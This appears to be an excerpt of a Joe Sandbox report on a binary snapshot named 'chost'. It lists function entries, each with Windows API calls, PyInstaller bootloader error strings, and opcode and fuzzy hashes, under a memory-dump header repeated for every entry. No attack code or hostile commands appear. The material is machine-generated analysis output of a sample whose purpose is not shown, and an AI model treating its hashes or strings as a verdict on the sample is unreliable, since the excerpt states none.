                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                        • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                        • Instruction ID: daa309e79a971a5938048be77156e171a5db39da0d2077ee6da1dba294006256
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C421A821B09A4382E7654B7BA8D5179A250EF88B94F588274EA3DC33E9DE2CD591C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                        • Instruction ID: bcb615e6d2dc45115b3c08d31e0f14b4923dc47681d1c97be12a33c3beecd11d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB126C72A0C183C6FB749A2691A42B976A1FB50770F94C17DE6DAC6AC5DF3CE590CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                        • Instruction ID: 6c635943339b1005d1e5bfd80b3d1df99dec213bf81c3ee0982361b847a8193f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A126F33E0C183C6FF749A26E0946B966A1EB40754F988179E6D9C6BC4DF7CE884DB10
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                        • Opcode ID: 8551cb8fd9aa33fa89974f2b8a72d226fc03734e6e735fe4479b0ef4aef6e1ff
                                                                                                                                                                                                                                        • Instruction ID: ec5b29f3ee001a00052139818e83dbfb05d0e20ceda91b008959f46fcfd6e79a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8551cb8fd9aa33fa89974f2b8a72d226fc03734e6e735fe4479b0ef4aef6e1ff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2415E21A0865382EA30DB33A8866B9B394FF45BC4F4484B9ED5DC7796DE3CE505CB40
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                        • Opcode ID: bfba3adfebe2dcdc93abc573ebea260fdba1b78c19a21fbbb5393bdda8e9346d
                                                                                                                                                                                                                                        • Instruction ID: fbe4bb88f423b63cf7ec68f3a98233567181d92f7e926d74c7dbaf814e6d0848
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfba3adfebe2dcdc93abc573ebea260fdba1b78c19a21fbbb5393bdda8e9346d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73416D31A0868395EF20DB3394825B9B3A1EF44794F84C4BAEE4D87B96DE3CE505CB04
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                        • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                        • Instruction ID: c486dad9c05d8cdaf301deaaaed40cbe5c3140edf7d59c87d9ecfd8de4fe6594
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2D180729087428AEB309B76D4833AD37A4FB45798F108179EE8D97B9ADF38E455C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF694362D99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                        • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                        • Instruction ID: 649b692ec7860ba4d2938e5c25e096bf65b030219bf8595977c55acd525289bf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A331C962708A4252E630AB37A8952AA76A5FF84794F418139EF4DD3799DF3CD506C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDBD
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDCB
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDF5
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DE63
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DE6F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                        • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                        • Instruction ID: 4e51e24897ab5e689e34f907e73ef028a1fa941d7c3d74bd6b039c1a6f81117a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4131CD21B2A64391EE32DB23A8825B57394FF58BA0F598579ED1D8B394EF3CE444C314
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                        • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                        • Instruction ID: 62e54395bb7fd12c43ef6a8c36fccbdd252edc5485441615264bfcb35107bb73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8418531A1CA8791EA31DB32E4A62E97321FF54384F90817AEA5DC3695EF3CE615C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF69436351A,?,00000000,00007FF694363F23), ref: 00007FF694362AA0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                        • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                        • Instruction ID: 6df2a56c3738d86e5d6a339276a50b68680bbf87c9199da9b85550d10549a381
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15217172A1978292E6309B62B8817EA73A4FB88784F40417AFE8CC3759DF7CD545C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                        • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                        • Instruction ID: dfac49619780feb5d93848e7621fc4e5cfc3faa2b3d635ae4d3be7712b64e3f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8211630A0E246C1FA7467739AD213D5162DF447A4F14C7BCEABED6AD6DE2CA441C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                        • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                        • Instruction ID: 89c7e07bea03e281a3f6895b136475e7b3b963054bbb9bbe71837d890f7d4b54
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A119621718A4286E7609B63E8D5329E2A0FB88FE4F148278E95DC77A4DF3CD804C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF694369216), ref: 00007FF694368592
                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943685E9
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439
                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF694368678
                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943686E4
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943686F5
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF69436870A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                        • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                        • Instruction ID: 1d260c8d88df7c3960d56c470f4246ca93e34f8170f56d9695635efa69ddb558
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00418462B1968381E6349B33A5816AA7394FF88BC8F458179DF8DD7B89DE3CE501C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B347
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B37D
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3AA
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3BB
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3CC
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3E7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
